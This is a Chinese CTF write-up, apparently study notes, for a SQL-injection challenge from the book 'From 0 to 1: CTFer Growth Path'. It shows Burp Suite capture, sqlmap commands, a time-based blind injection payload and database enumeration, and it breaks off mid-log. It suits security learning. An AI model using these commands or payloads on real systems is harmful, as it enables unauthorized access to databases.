[第一章 web入门]SQL注入-2
介绍:记录一下笔记,方便以后迅速回忆使用。
《从0到1:CTFer成长之路》书籍配套题目,来源网站:《从0到1:CTFer成长之路》
一、信息收集
1.首页
- …/login.php
2.登录成功会跳转到
- …/user.php
3.进行测试判断
[1].先用Burp suite抓包看一下
提交的信息有
name=user&pass=passwd
二、尝试破解
1.用post型的sqlmap破解
<1>.首先,开burp截包
<2>.输入username,passwd,提交。
可以看见,burp已经把id获取到了
<3>.copy to file,保存为txt文件,放到sqlmap的目录,(MyFile/bf.txt)
<4>.开始跑sqlmap破解
python sqlmap.py -r MyFile/bf.txt
- 结果
---
Parameter: name (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=username' AND (SELECT 1848 FROM (SELECT(SLEEP(5)))DRxp) AND 'PkUZ'='PkUZ&pass=passwd
---
成功找到注入点,那剩下的就按步就班
<5>.按步就班
[1].sqlmap爆当前数据库信息
python sqlmap.py -r MyFile/bf.txt --current-db
[10:10:29] [INFO] adjusting time delay to 1 second due to good response times
note
current database: 'note'
用sqlmap爆出库名:note
[2].sqlmap.列出指定数据库所有的表名
python sqlmap.py -r MyFile/bf.txt -D note --tables
[10:14:41] [INFO] retrieved:
[10:14:47] [INFO] adjusting time delay to 1 second due to good response times
fl4g
[10:15:02] [INFO